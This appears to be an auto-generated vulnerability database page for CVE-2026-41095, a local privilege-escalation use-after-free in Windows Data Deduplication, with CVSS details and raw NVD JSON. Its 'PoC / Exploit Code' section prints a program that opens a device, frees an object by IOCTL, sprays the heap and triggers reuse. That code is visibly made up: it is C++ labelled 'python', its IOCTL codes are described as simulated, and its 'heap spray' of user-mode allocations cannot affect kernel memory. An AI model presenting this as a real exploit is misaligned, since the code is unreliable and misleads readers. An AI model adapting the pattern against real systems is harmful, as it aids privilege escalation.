Security Vulnerability Report
中文
CVE-2026-41095 CVSS 7.8 HIGH

CVE-2026-41095

Published: 2026-05-12 18:17:21
Last Modified: 2026-05-13 15:34:53

Description

Use after free in Data Deduplication allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Windows Server 2019
Windows Server 2022
Windows Server 2025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-41095 (Conceptual Use-After-Free) // This code demonstrates the logic of triggering a UAF in a kernel driver. #include <windows.h> #include <iostream> // Simulate the IOCTL codes for the Dedup service #define IOCTL_TRIGGER_FREE 0x80002010 #define IOCTL_TRIGGER_USE 0x80002014 void SprayHeap() { // Implementation of heap spraying to occupy the freed memory // Allocating multiple objects of the same size as the freed object for (int i = 0; i < 1000; i++) { HeapAlloc(GetProcessHeap(), 0, 0x100); } } int main() { HANDLE hDevice = CreateFile(L"\\\\.\\DedupDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { std::cout << "Failed to open device." << std::endl; return 1; } DWORD bytesReturned; // Step 1: Trigger the vulnerability by freeing an object DeviceIoControl(hDevice, IOCTL_TRIGGER_FREE, NULL, 0, NULL, 0, &bytesReturned, NULL); // Step 2: Spray the heap to control the freed memory SprayHeap(); // Step 3: Trigger the Use-After-Free to execute code DeviceIoControl(hDevice, IOCTL_TRIGGER_USE, NULL, 0, NULL, 0, &bytesReturned, NULL); std::cout << "Exploit triggered." << std::endl; CloseHandle(hDevice); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41095", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:21.020", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Data Deduplication allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41095", "source": "[email protected]"}]}}